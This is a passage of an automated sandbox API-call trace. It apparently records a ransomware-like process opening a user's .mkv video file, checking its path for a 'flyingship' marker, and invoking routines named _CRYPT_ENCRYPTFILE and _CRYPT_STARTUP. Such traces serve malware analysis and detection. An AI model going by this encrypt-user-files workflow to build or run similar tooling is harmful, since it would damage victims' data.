RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.089] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd378 [0192.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.090] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\axsaypuzrscymoeip6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.091] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.091] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.091] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.091] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.091] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0192.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0192.092] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.092] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0192.092] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.092] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0192.092] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.092] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0192.092] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0192.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0x90add8 [0192.093] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0x90add8 [0192.093] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.094] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YY6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aXsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XsAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AYPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YPuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PuZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RSCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SCYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CYMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YMOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MOeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oeip6.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.096] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.096] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.096] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.097] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4feb80, ftCreationTime.dwHighDateTime=0x1d5daaa, ftLastAccessTime.dwLowDateTime=0xfe4da90, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xfe4da90, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0xaee7, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="aXsAYPuZRSCYMOeip6.mkv", cAlternateFileName="AXSAYP~1.MKV")) returned 0x90ae18 [0192.097] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.097] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.097] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.097] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.097] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.097] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.098] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.098] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.098] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.098] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.098] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.098] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 